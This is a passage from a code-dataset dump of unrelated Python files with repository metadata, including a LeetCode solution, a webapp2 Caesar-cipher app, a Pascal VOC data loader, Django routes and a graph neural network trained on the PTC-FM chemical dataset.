\"top\"))\n","repo_name":"BenBenBenB/nbs-structure-generator","sub_path":"nbs_structure_generator/wall_song/generate_wall_song.py","file_name":"generate_wall_song.py","file_ext":"py","file_size_in_byte":33359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18222157232","text":"class Solution:\n def minimumSeconds(self, land: List[List[str]]) -> int:\n self.dirs = [0, 1, 0, -1, 0]\n m = len(land)\n n = len(land[0])\n floodDist = self._getFloodDist(land)\n startPos = self._getStartPos(land, 'S')\n\n q = collections.deque([startPos])\n seen = {startPos}\n\n step = 1\n while q:\n for _ in range(len(q)):\n i, j = q.popleft()\n for k in range(4):\n x = i + self.dirs[k]\n y = j + self.dirs[k + 1]\n if x < 0 or x == m or y < 0 or y == n:\n continue\n if land[x][y] == 'D':\n return step\n if floodDist[x][y] <= step or land[x][y] == 'X' or (x, y) in seen:\n continue\n q.append((x, y))\n seen.add((x, y))\n step += 1\n\n return -1\n\n def _getFloodDist(self, land: List[List[str]]) -> List[List[int]]:\n m = len(land)\n n = len(land[0])\n dist = [[math.inf] * n for _ in range(m)]\n q = collections.deque()\n seen = set()\n\n for i, row in enumerate(land):\n for j, cell in enumerate(row):\n if cell == '*':\n q.append((i, j))\n seen.add((i, j))\n\n d = 0\n while q:\n for _ in range(len(q)):\n i, j = q.popleft()\n dist[i][j] = d\n for k in range(4):\n x = i + self.dirs[k]\n y = j + self.dirs[k + 1]\n if x < 0 or x == m or y < 0 or y == n:\n continue\n if land[x][y] in 'XD' or (x, y) in seen:\n continue\n q.append((x, y))\n seen.add((x, y))\n d += 1\n\n return dist\n\n def _getStartPos(self, land: List[List[str]], c: str) -> Tuple[int, int]:\n for i, row in enumerate(land):\n for j, cell in enumerate(row):\n if cell == c:\n return i, j\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/2814. Minimum Time Takes to Reach Destination Without Drowning/2814.py","file_name":"2814.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"26561049721","text":"# This code wrapps global_distribution.py and plots the L-MLT distributution\n# for curtains and flashes.\n\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport global_distribution\n\n# Load the normalization histogram\nL_edges = np.load(os.path.abspath('./normalization/L_edges_norm.npy'))\nMLT_edges = np.load(os.path.abspath('./normalization/MLT_edges_norm.npy'))\nnorm = np.load(os.path.abspath('./normalization/L_MLT_sec_norm.npy')).T+1\n\nfig, axArr = plt.subplots(2, figsize=(15,8), sharex=True)\nfPath = os.path.abspath('./../data/flash_catalogues/flash_catalogue_v2_sorted.txt')\npltObj = global_distribution.GlobalDistribution(fPath, burstType='flashes')\nim = pltObj.rectDistributionPlot(ax=axArr[0], Lbins=L_edges, MLTbins=MLT_edges,\n norm=norm)\nplt.colorbar(im, ax=axArr[0], label='Detections (un-normalized)')\n\n# fPath = os.path.abspath('./../data/curtain_catalogues/curtains_catalogue.txt')\n# pltObj = global_distribution.GlobalDistribution(fPath, burstType='curtains')\n# im2 = pltObj.rectDistributionPlot(ax=axArr[1], Lbins=L_edges, MLTbins=MLT_edges,\n# norm=norm)\n# plt.colorbar(im2, ax=axArr[1], label='Detections (un-normalized)')\n\naxArr[0].set(title='Flash distribution', ylabel='L')\n#axArr[1].set(title='Curtain distribution', ylabel='L', xlabel='MLT')\n\nfor ax in axArr:\n ax.set_aspect('equal')\nplt.tight_layout()\nplt.show()","repo_name":"mshumko/ac6_microburst_scale_sizes","sub_path":"stats/old/L_MLT_distribution.py","file_name":"L_MLT_distribution.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39052796317","text":"import webapp2\nimport caesar\nimport cgi\n\ndef pageSetup(enc_content):\n up_content = '''\n \n STLCC - LC101 - Web Caesar\n \n

Web Caesar - STLCC LC101

\n Please enter some text for conversion:
\n '''\n text_content = '
'\n code_content = '''\n
Please enter your encryption code:
\n \n
\n '''\n button_content = '
'\n down_content = ''\n form_start = ''\n form_end = ''\n form = form_start + text_content + code_content + button_content + form_end\n form_content = up_content + form + down_content\n\n return form_content\n\n\nclass MainHandler(webapp2.RequestHandler):\n\n def get(self):\n the_content = pageSetup(\"\")\n self.response.write(the_content)\n\n\n def post(self):\n enc_content = caesar.encrypt(self.request.get(\"content\"), self.request.get(\"code\"))\n esc_content = cgi.escape(enc_content)\n the_content = pageSetup(esc_content)\n self.response.write(the_content)\n\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler)\n], debug=True)\n","repo_name":"tmaaz/web-caesar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42222342704","text":"from utils import get_project_root\nfrom core.creating_features_and_preprocessing.create_raw_features import get_features\nimport numpy as np\nimport keras\n\nclasses = [\"0 - blues\", \"1 - classical\", \"2 - country\", \"3 - disco\", \"4 - hiphop\",\n \"5 - jazz\", \"6 - metal\", \"7 - pop\", \"8 - reggae\", \"9 - rock\", ]\n\n# directories\nroot_directory = get_project_root()\npreprocessing_directory = f\"{root_directory}/data/preprocessing_parameters/\"\nmodel_save_directory = f\"{root_directory}/saved_models/keras_model/\"\n\n# get parameters for rescaling\nstds = np.load(f\"{preprocessing_directory}/stds.npy\")\nmeans = np.load(f\"{preprocessing_directory}/means.npy\")\n\n# file path for target file\nsample_file_path = f\"{root_directory}/data/genres/blues/blues.00020.au\"\n\nmodel = keras.models.load_model(model_save_directory)\n\nx = get_features(sample_file_path)\nx = (x - means) / stds\nx = np.array(x).reshape(-1,26)\n\noutput = model.predict(x)\noutput_class = np.argmax(output)\nprint(classes[output_class])","repo_name":"benpicker/deep_knn_music_classifier","sub_path":"core/evaluation/keras_evaluate.py","file_name":"keras_evaluate.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15938877081","text":"\nimport collections\nfrom tensorflow.python.autograph.pyct import origin_info\nfrom tensorflow.python.util import traceback_utils\nclass FrameInfo(\n collections.namedtuple('FrameInfo',\n ('filename', 'lineno', 'function_name', 'code',\n 'is_converted', 'is_allowlisted'))):\n __slots__ = ()\ndef _stack_trace_inside_mapped_code(tb, source_map, converter_filename):\n \"\"\"Summarizes inner traceback frames up to the call to a given function.\n This functions locates the innermost (i.e. most recent) frame that corresponds\n to code that can be mapped by source_map originated from, and returns a\n translated stack trace ending at that frame. If no such frame is found, the\n entire stack trace is summarized.\n For example, the following code:\n def f():\n for i in tf.range(1):\n Would generate this traceback:\n \n ag__.for_stmt(...)\n \n return _known_len_tf_for_stmt(iter_, extra_test, body, init_state)\n <_known_len_tf_for_stmt>\n _disallow_undefs_into_loop(*init_state)\n <_disallow_undefs_into_loop>\n raise ...\n Which is then processed into:\n \n for i in tf.range(1):\n \n return _known_len_tf_for_stmt(iter_, extra_test, body, init_state)\n <_known_len_tf_for_stmt>\n _disallow_undefs_into_loop(*init_state)\n <_disallow_undefs_into_loop>\n raise ...\n Args:\n tb: traceback.FrameSummary, The traceback corresponding to an error.\n Typically, the output of traceback.Summary.extract(capture_locals=True).\n source_map: Dict[LineLocation, OriginInfo], a source map as created by\n origin_info.create_source_map.\n converter_filename: str, the file path of the converted module. Call frames\n corresponding to this module are elided and their preceding frames are\n marked as allowlisted. Note that frames enclosing converted code are\n dropped using a different mechanism.\n Returns:\n List[FrameInfo]\n \"\"\"\n result_frames = []\n for filename, line_number, function_name, text in reversed(tb):\n loc = origin_info.LineLocation(filename=filename, lineno=line_number)\n if loc in source_map:\n origin = source_map[loc]\n fi = FrameInfo(\n filename=origin.loc.filename,\n lineno=origin.loc.lineno,\n function_name=origin.function_name,\n code=origin.source_code_line,\n is_converted=True,\n is_allowlisted=False)\n result_frames.append(fi)\n break\n if filename == converter_filename:\n if result_frames:\n prev = result_frames[-1]\n fi = FrameInfo(\n filename=prev.filename,\n lineno=prev.lineno,\n function_name=prev.function_name,\n code=prev.code,\n is_converted=False,\n is_allowlisted=True)\n result_frames[-1] = fi\n continue\n fi = FrameInfo(\n filename=filename,\n lineno=line_number,\n function_name=function_name,\n code=text,\n is_converted=False,\n is_allowlisted=False)\n result_frames.append(fi)\n return tuple(result_frames)\nKNOWN_STRING_CONSTRUCTOR_ERRORS = (\n AssertionError,\n AttributeError,\n NameError,\n NotImplementedError,\n RuntimeError,\n StopIteration,\n TypeError,\n UnboundLocalError,\n ValueError,\n)\nclass MultilineMessageKeyError(KeyError):\n def __init__(self, message, original_key):\n super(MultilineMessageKeyError, self).__init__(original_key)\n self.__message = message\n def __str__(self):\n return self.__message\nMultilineMessageKeyError.__name__ = KeyError.__name__\nclass ErrorMetadataBase(object):\n __slots__ = ('translated_stack', 'cause_message')\n def __init__(self, callsite_tb, cause_metadata, cause_message, source_map,\n converter_filename):\n translated_stack = _stack_trace_inside_mapped_code(\n callsite_tb, source_map, converter_filename)\n if cause_metadata is None:\n self.translated_stack = translated_stack\n self.cause_message = cause_message\n else:\n self.translated_stack = (\n cause_metadata.translated_stack + (translated_stack[-1],))\n self.cause_message = cause_metadata.cause_message\n def get_message(self):\n lines = []\n lines.append('in user code:')\n lines.append('')\n for frame_info in reversed(self.translated_stack):\n if (traceback_utils.is_traceback_filtering_enabled() and\n not traceback_utils.include_frame(frame_info.filename)):\n continue\n formatted_line = (f' File \"{frame_info.filename}\", line '\n f'{frame_info.lineno}, in {frame_info.function_name}')\n if frame_info.is_converted:\n formatted_line += ' *'\n elif frame_info.is_allowlisted:\n formatted_line += ' **'\n lines.append(formatted_line)\n if frame_info.code is None:\n code_snippet = ''\n else:\n code_snippet = frame_info.code.strip()\n lines.append(' {}'.format(code_snippet))\n lines.append('')\n message_lines = self.cause_message.split('\\n')\n for i in range(len(message_lines)):\n message_lines[i] = ' ' + message_lines[i]\n lines.extend(message_lines)\n lines.append('')\n return '\\n'.join(lines)\n def create_exception(self, source_error):\n preferred_type = type(source_error)\n to_ret = None\n if preferred_type.__init__ is Exception.__init__:\n to_ret = preferred_type(self.get_message())\n if preferred_type in KNOWN_STRING_CONSTRUCTOR_ERRORS:\n to_ret = preferred_type(self.get_message())\n elif preferred_type is KeyError:\n to_ret = MultilineMessageKeyError(self.get_message(), self.cause_message)\n if to_ret is not None:\n return to_ret.with_traceback(source_error.__traceback__)\n def to_exception(self, source_error):\n exc = self.create_exception(source_error)\n exc.__suppress_context__ = True\n exc.ag_error_metadata = self\n return exc\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_3/error_utils.py.transformed.py","file_name":"error_utils.py.transformed.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70139983732","text":"# -*- coding: utf-8 -*-\n\n# -*- coding: utf-8 -*-\n\nimport torch\nimport torchvision.transforms.functional as F\nfrom torchvision.datasets.vision import VisionDataset\nfrom torchvision.datasets.voc import download_extract\nfrom PIL import Image\nimport xml.etree.ElementTree as ET\nimport os\nimport collections\nfrom torchvision import transforms\n\nVOC_CLASSES = ('__background__', 'aeroplane', 'bicycle', 'bird', 'boat',\n 'bottle', 'bus', 'car', 'cat', 'chair',\n 'cow', 'diningtable', 'dog', 'horse',\n 'motorbike', 'person', 'pottedplant',\n 'sheep', 'sofa', 'train', 'tvmonitor')\nCLS_TO_IND = {k: v for v, k in enumerate(VOC_CLASSES)}\n \n## between comments taken from the torchvision source code with modifications to include\nDATASET_YEAR_DICT = {\n '2012': { \n 'trainval': {\n 'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2012/VOCtrainval_11-May-2012.tar',\n 'filename': 'VOCtrainval_11-May-2012.tar',\n 'md5': '6cd6e144f989b92b3379bac3b3de84fd',\n 'base_dir': 'VOCdevkit/VOC2012'\n },\n 'test': {\n 'url': 'http://pjreddie.com/media/files/VOC2012test.tar',\n 'filename': 'VOC2012test.tar',\n 'md5': '',\n 'base_dir': 'VOCdevkit/VOC2012'\n }\n },\n '2011': {\n 'trainval': {\n 'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2011/VOCtrainval_25-May-2011.tar',\n 'filename': 'VOCtrainval_25-May-2011.tar',\n 'md5': '6c3384ef61512963050cb5d687e5bf1e',\n 'base_dir': 'TrainVal/VOCdevkit/VOC2011'\n }\n },\n '2010': {\n 'trainval': {\n 'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2010/VOCtrainval_03-May-2010.tar',\n 'filename': 'VOCtrainval_03-May-2010.tar',\n 'md5': 'da459979d0c395079b5c75ee67908abb',\n 'base_dir': 'VOCdevkit/VOC2010'\n }\n },\n '2009': {\n 'trainval': {\n 'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2009/VOCtrainval_11-May-2009.tar',\n 'filename': 'VOCtrainval_11-May-2009.tar',\n 'md5': '59065e4b188729180974ef6572f6a212',\n 'base_dir': 'VOCdevkit/VOC2009'\n }\n },\n '2008': {\n 'trainval': {\n 'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2008/VOCtrainval_14-Jul-2008.tar',\n 'filename': 'VOCtrainval_11-May-2012.tar',\n 'md5': '2629fa636546599198acfcfbfcf1904a',\n 'base_dir': 'VOCdevkit/VOC2008'\n }\n },\n '2007': {\n 'trainval': {\n 'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2007/VOCtrainval_06-Nov-2007.tar',\n 'filename': 'VOCtrainval_06-Nov-2007.tar',\n 'md5': 'c52e279531787c972589f7e41ab4ae64',\n 'base_dir': 'VOCdevkit/VOC2007'\n },\n 'test': {\n 'url': 'http://host.robots.ox.ac.uk/pascal/VOC/voc2007/VOCtest_06-Nov-2007.tar',\n 'filename': 'VOCtest_06-Nov-2007.tar',\n 'md5': 'b6e924de25625d8de591ea690078ad9f',\n 'base_dir': 'VOCdevkit/VOC2007'\n }\n }\n}\n\nclass VOCDetection(VisionDataset):\n \"\"\"`Pascal VOC `_ Detection Dataset.\n Args:\n root (string): Root directory of the VOC Dataset.\n year (string, optional): The dataset year, supports years 2007 to 2012.\n image_set (string, optional): Select the image_set to use, ``train``, ``trainval`` or ``val``\n download (bool, optional): If true, downloads the dataset from the internet and\n puts it in root directory. If dataset is already downloaded, it is not\n downloaded again.\n (default: alphabetic indexing of VOC's 20 classes).\n transform (callable, optional): A function/transform that takes in an PIL image\n and returns a transformed version. E.g, ``transforms.RandomCrop``\n target_transform (callable, required): A function/transform that takes in the\n target and transforms it.\n transforms (callable, optional): A function/transform that takes input sample and its target as entry\n and returns a transformed version.\n \"\"\"\n\n def __init__(self,\n root,\n image_set='sbdval',\n transform=None,\n target_transform=None,\n transforms=None):\n super(VOCDetection, self).__init__(root, transforms, transform, target_transform)\n self.root = root \n self.image_set = image_set\n base_dir = 'VOCdevkit/VOC2012'\n voc_root = os.path.join(self.root, base_dir)\n image_dir = os.path.join(voc_root, 'JPEGImages')\n annotation_dir = os.path.join(voc_root, 'Annotations')\n\n if not os.path.isdir(voc_root):\n raise RuntimeError('Dataset not found or corrupted.' +\n ' You can use download=True to download it')\n splits_dir = os.path.join(voc_root, 'ImageSets/Main')\n split_f = os.path.join(splits_dir, image_set.rstrip('\\n') + '.txt')\n\n if not os.path.exists(split_f):\n raise ValueError(\n 'Wrong image_set entered! Please use image_set=\"train\" '\n 'or image_set=\"trainval\" or image_set=\"val\" or a valid'\n 'image_set from the VOC ImageSets/Main folder.')\n\n with open(os.path.join(split_f), \"r\") as f:\n file_names = [x.strip() for x in f.readlines()]\n\n self.images = [os.path.join(image_dir, x + \".jpg\") for x in file_names]\n self.annotations = [os.path.join(annotation_dir, x + \".xml\") for x in file_names]\n assert (len(self.images) == len(self.annotations))\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target) where target is a dictionary of the XML tree.\n \"\"\"\n img = Image.open(self.images[index]).convert('RGB')\n target = self.parse_voc_xml(\n ET.parse(self.annotations[index]).getroot())\n\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target\n\n def __len__(self):\n return len(self.images)\n\n def parse_voc_xml(self, node):\n voc_dict = {}\n children = list(node)\n if children:\n def_dic = collections.defaultdict(list)\n for dc in map(self.parse_voc_xml, children):\n for ind, v in dc.items():\n def_dic[ind].append(v)\n voc_dict = {\n node.tag:\n {ind: v[0] if len(v) == 1 else v\n for ind, v in def_dic.items()}\n }\n if node.text:\n text = node.text.strip()\n if not children:\n voc_dict[node.tag] = text\n return voc_dict\n \n## End code from elsewhere\nopen_transform = transforms.Compose(\n [transforms.Resize([448, 448]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n )\n\n\nclass VOCWeak(VOCDetection):\n def __init__(self, \n root,\n image_set='sbdval'):\n super(VOCWeak, self).__init__(root, image_set)\n \n def __getitem__(self, index):\n # img = F.to_tensor(Image.open(self.images[index]).convert('RGB'))\n img = open_transform(Image.open(self.images[index]).convert('RGB'))\n tree = ET.parse(self.annotations[index])\n\n objects = tree.findall('object')\n num_objs = len(objects)\n boxes = torch.zeros((num_objs, 4))\n boxes_cl = torch.zeros((num_objs,)).long()\n \n for i, ob in enumerate(objects):\n bbox = ob.find('bndbox')\n boxes[i, :] = torch.tensor([float(bbox.find('xmin').text),\n float(bbox.find('ymin').text),\n float(bbox.find('xmax').text),\n float(bbox.find('ymax').text)])\n boxes_cl[i] = CLS_TO_IND[ob.find('name').text.lower().strip()]\n\n img_labels = torch.zeros((21,))\n img_labels[boxes_cl] = 1\n\n return img, img_labels, boxes, boxes_cl, tree.find('filename').text[:-4]\n","repo_name":"ZechengLi19/CIM","sub_path":"lib/prm/voc_dataset.py","file_name":"voc_dataset.py","file_ext":"py","file_size_in_byte":8305,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"9394115235","text":"from django.urls import path\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('', views.home, name=\"home\"),\r\n path('login/', views.loginpage, name=\"login\"),\r\n path('logout/', views.logoutpage, name=\"logout\"),\r\n path('register/', views.registerpage, name=\"register\"),\r\n path('places//', views.place, name=\"places\"),\r\n path('create-place/', views.createplace, name=\"create-place\"),\r\n path('update-place//', views.updateplace, name=\"update-place\"),\r\n path('delete-place//', views.deleteplace, name=\"delete-place\"),\r\n path('delete-comment//', views.deletecomment, name=\"delete-comment\"),\r\n path('user-profile//', views.userprofile, name=\"user-profile\"),\r\n path('update-user/', views.updateuser, name=\"update-user\"),\r\n path('mobile-topic/', views.topicpage, name=\"mobile-topics\"),\r\n path('mobile-activity/', views.activitypage, name=\"mobile-activity\")\r\n]\r\n","repo_name":"linlatt33/python_travel","sub_path":"place/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18747756248","text":"import sys\n\n# Mapping from ANSI to UTF-8\nmapANSI2UTF8 = {\n '\\xB9':'\\xC4\\x85',\n '\\xE6':'\\xC4\\x87',\n '\\xEA':'\\xC4\\x99',\n '\\xB3':'\\xC5\\x82',\n '\\xF1':'\\xC5\\x84',\n '\\xF3':'\\xC3\\xB3',\n '\\x9C':'\\xC5\\x9B',\n '\\x9F':'\\xC5\\xBA',\n '\\xBF':'\\xC5\\xBC',\n '\\xA5':'\\xC4\\x84',\n '\\xC6':'\\xC4\\x86',\n '\\xCA':'\\xC4\\x98',\n '\\xA3':'\\xC5\\x81',\n '\\xD1':'\\xC5\\x83',\n '\\xD3':'\\xC3\\x93',\n '\\x8C':'\\xC5\\x9A',\n '\\x8F':'\\xC5\\xB9',\n '\\xAF':'\\xC5\\xBB'\n }\n\n# Mapping from ANSI to ASCII (in case anyone prefers)\nmapANSI2ASCII = {\n '\\xB9':'a',\n '\\xE6':'c',\n '\\xEA':'e',\n '\\xB3':'l',\n '\\xF1':'n',\n '\\xF3':'o',\n '\\x9C':'s',\n '\\x9F':'z',\n '\\xBF':'z',\n '\\xA5':'A',\n '\\xC6':'C',\n '\\xCA':'E',\n '\\xA3':'L',\n '\\xD1':'N',\n '\\xD3':'O',\n '\\x8C':'S',\n '\\x8F':'Z',\n '\\xAF':'Z'\n }\n\n# Processes a file byte-by-byte and converts polish characters from ANSI to UTF8\ndef convert(path):\n srt = open(path, 'rb')\n text = '\\xEF\\xBB\\xBF'\n while True:\n byte = srt.read(1)\n if '' == byte:\n break\n if byte in mapANSI2UTF8:\n text += mapANSI2UTF8[byte]\n else:\n text += byte\n srt.close()\n srt = open(path, 'wb')\n srt.write(text)\n srt.close()\n\n# Runs conversion for every file passed as input argument\nfor file in sys.argv[1:]:\n convert(file)\n","repo_name":"altermarkive/python-experiments","sub_path":"convert-polish-ansi-to-utf8/convert_polish_ansi_to_utf8.py","file_name":"convert_polish_ansi_to_utf8.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74220690614","text":"def solution(answers):\n answer = []\n supo1=[1,2,3,4,5]\n supo2=[2,1,2,3,2,4,2,5]\n supo3=[3,3,1,1,2,2,4,4,5,5]\n count = [0,0,0]\n for i,v in enumerate(answers):#enumerate 사용법 익히자. i 는 인덱스 v는 벨류\n if v == supo1[ i %len(supo1)]:#이걸로 길이에 맞게 계산 :\n count[0]+=1\n if v == supo2[i%len(supo2)]:#이걸로 길이에 맞게 계산 :\n count[1]+=1\n if v == supo3[i%len(supo3)]:#이걸로 길이에 맞게 계산 \n count[2]+=1 \n for i,v in enumerate(count):\n if v == max(count):\n answer.append(i+1)\n print(answer)\n return answer","repo_name":"choeyejin12/baekjoon","sub_path":"프로그래머스/lv1/42840. 모의고사/모의고사.py","file_name":"모의고사.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74066368694","text":"from rat import Rat\r\n\r\n\r\nalice = Rat(\"Alice\")\r\nbob = Rat(\"Bob\")\r\n\r\ntest_dm = alice.dm(\"The cheese stands alone\", bob)\r\ntest_reply = bob.reply(\"Blah blah blah\", test_dm)\r\n\r\nprint(alice)","repo_name":"Kenneth-Siu/chitter-python","sub_path":"chitter.py","file_name":"chitter.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6740755636","text":"import os.path as osp\r\nimport torch, torch_geometric,random\r\nimport torch.nn as nn\r\nfrom torch.utils.data import TensorDataset\r\nfrom torch_geometric.data import Dataset\r\nfrom torch_geometric.data import Data, DataLoader\r\nimport numpy as np\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nfrom sklearn.utils import shuffle\r\n\r\n\r\nnb_graph = 349\r\ndata_list = [0]\r\nmin_values, max_values = [0 for _ in range(350)], [0 for _ in range(350)]\r\nmin_values[1], max_values[1], max_values[349], idx = 1, 2, 4925, 1\r\n\r\nf = open(\"PTC-FM.graph_idx\", \"r\")\r\nfor row in range(1,4926):\r\n n = int(f.readline())\r\n if n != idx:\r\n max_values[idx] = row - 1\r\n idx += 1\r\n min_values[idx] = row\r\n\r\n\r\n\r\nedgeList_minValues, edgeList_maxValues = [0 for _ in range(350)], [0 for _ in range(350)]\r\nf = open(\"PTC-FM.edges\",\"r\")\r\ngraph_ind = 1\r\nfor row in range(1,54*187+13):\r\n v1,v2 = f.readline().split(sep=\",\")\r\n v1,v2 = int(v1), int(v2)\r\n if v1>max_values[graph_ind]:\r\n edgeList_maxValues[graph_ind] = row - 1\r\n edgeList_minValues[graph_ind + 1] = row\r\n graph_ind += 1\r\n\r\nedgeList_minValues[1], edgeList_maxValues[349] = 1, 54*187+12\r\n\r\n\r\nf_nodeLabels = open(\"PTC-FM.node_labels\",\"r\")\r\nf_edge = open(\"PTC-FM.edges\",\"r\")\r\nf_edgeLabels = open(\"PTC-FM.link_labels\",\"r\")\r\nf_graphLabels = open(\"PTC-FM.graph_labels\",\"r\")\r\n\r\ngraph_ind, edge_ind, node_ind = 1, 1, 1\r\n\r\n\r\n\r\nwhile graph_ind < 350:\r\n nb_node = max_values[graph_ind] - min_values[graph_ind] + 1\r\n x = np.zeros(shape=(nb_node, 18))\r\n for _ in range(nb_node):\r\n lbl = int(f_nodeLabels.readline())\r\n x[_,lbl] = 1\r\n nb_edge = edgeList_maxValues[graph_ind] - edgeList_minValues[graph_ind] + 1\r\n edge1, edge2 = np.array([0 for _ in range(nb_edge)]), np.array([0 for _ in range(nb_edge)])\r\n edge_matrix = np.zeros(shape=(nb_edge, 4))\r\n for _ in range(nb_edge):\r\n v1, v2 = f_edge.readline().split(sep=\",\")\r\n v1, v2 = int(v1), int(v2)\r\n edge1[_], edge2[_] = v1, v2\r\n lbl = int(f_edgeLabels.readline())\r\n edge_matrix[_,lbl] = 1\r\n\r\n edge1, edge2 = edge1-min_values[graph_ind], edge2-min_values[graph_ind]\r\n out_y = 1 if int(f_graphLabels.readline())==1 else 0\r\n y = np.array([out_y])\r\n data_list.append(Data(x=torch.tensor(data=x, dtype=torch.float), edge_attr=torch.tensor(data=edge_matrix, dtype=torch.float),\r\n edge_index=torch.tensor(data=[edge1,edge2], dtype=torch.long),\r\n y = torch.tensor(data=y, dtype=torch.float)))\r\n graph_ind += 1\r\ndel data_list[0]\r\n\r\nloader = DataLoader(data_list, batch_size = 32, shuffle=True)\r\n\r\n\r\n\r\nclass NeuralNetwork(torch.nn.Module):\r\n def __init__(self):\r\n\r\n super(NeuralNetwork,self).__init__()\r\n self.nnconv1 = torch_geometric.nn.NNConv(in_channels=18, out_channels=10, nn=torch.nn.Sequential(nn.Linear(in_features=4,out_features=180)))\r\n self.nnconv2 = torch_geometric.nn.NNConv(in_channels=10, out_channels=7, nn=torch.nn.Sequential(nn.Linear(in_features=4, out_features=70)))\r\n self.w1 = torch.nn.Linear(in_features=7,out_features=20,bias=True)\r\n self.w2 = torch.nn.Linear(in_features=20,out_features=10,bias=True)\r\n self.w3 = torch.nn.Linear(in_features=10, out_features=1, bias=True)\r\n\r\n def forward(self, data):\r\n\r\n x, edge_index,edge_attr = data.x, data.edge_index,data.edge_attr\r\n x = self.nnconv1(x,edge_index,edge_attr)\r\n x = self.nnconv2(x,edge_index,edge_attr)\r\n nb_nodes = int(x.shape[0])\r\n cluster = torch.tensor(data=np.zeros(shape=(nb_nodes,)))\r\n btc = torch.tensor(data=np.zeros(shape=(nb_nodes,)))\r\n x = torch_geometric.nn.avg_pool_x(cluster=cluster,x = x,batch=btc)[0]\r\n x = F.relu(self.w1(x))\r\n x = F.relu(self.w2(x))\r\n x = self.w3(x)\r\n x = torch.sigmoid(x)\r\n return x\r\n\r\n\r\n\r\nNetwork = NeuralNetwork()\r\noptimizer = optim.SGD(params=Network.parameters(),lr=0.0005,momentum=0.9)\r\ncriterion = nn.BCELoss()\r\nnb_epoch = 1500\r\ntotal_lost = 0\r\n\r\ndata_list_train = data_list[:299]\r\ndata_list_test = data_list[299:]\r\n\r\nfor _ in range(nb_epoch):\r\n ls = 0\r\n data_list_train = shuffle(data_list_train)\r\n for inp in data_list_train:\r\n optimizer.zero_grad()\r\n out = Network(inp)\r\n out = out.reshape(shape=(1,))\r\n loss = criterion(out,inp.y)\r\n ls += loss.data\r\n loss.backward()\r\n optimizer.step()\r\n print(ls)\r\n\r\n\r\n\r\n\r\nwrong_answers = 0\r\n\r\nfor v in data_list_test:\r\n o = Network(v).data\r\n o = 1 if o>(1/2) else 0\r\n if o != v.y.data:\r\n wrong_answers += 1\r\n\r\nprint(100*wrong_answers/len(data_list_test))\r\n\r\n\r\n","repo_name":"nartiniz/Chemical-Compound-Classification-GNNs","sub_path":"PTC-FMDataset.py","file_name":"PTC-FMDataset.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73370925492","text":"\nproject_path = '/Users/decandia/Dropbox/teresa_stuff/moving_triangles' #make sure this points to correct location\nplt_type = 'points' #how to visualize plots: this should be either 'points' or 'triangles'\nn = 6 #number of points\npersonal_space = 0. #how much space points require between themselves and other points\n\n\n# load packages and set directory\nimport numpy as np\nimport os\n\n\nos.chdir(project_path)\n\n\nimport visualize #local\nimport triangle_coords as tc #local\n\n\ndef other_vertex_rows(a): #a is 1d array containing current row\n vec = np.concatenate([np.arange(0,a), np.arange(a+1,n)])\n sub_vec = np.random.choice(vec, size=2, replace=False) #find two random integers between 0 and n-1, excluding the row\n return(sub_vec)\n\n\n#start with a number n of points (X and Y coordinates) random uniformly positioned in a square grid\np0 = np.random.rand(n, 2)\nv = np.full((n, 1), .001) #each point will assign velocities to each of those points\n#v = np.random.uniform(0,0.01,n).reshape(-1,1)\n\n\n#each point should be assigned two other points at random\nrows_v12 = np.apply_along_axis(other_vertex_rows, 1, np.arange(n).reshape(-1,1))\n\ncoords = tc.triangle_coords(n, p0, rows_v12) #instantiation of class for calculating point positions, and initialization of positions for each point\n#coords.step(dist_p0=v, personal_space=personal_space) #during each generation each point moves by dist_p0 with the objective of forming an equilateral triangle\n\nvisualize.main(triangle_coords = coords, dist_p0=v, personal_space=personal_space, plt_type=plt_type) #visualize points moving through successive calls of the coords.step() method\n\n\n\n\n'''\n\n#Functionality to add:\n\n#points should be constrained such that their initial positions do not overlap or collide (i.e., no closer than a certain margin away from each other)\n\n#better visualization of triangles 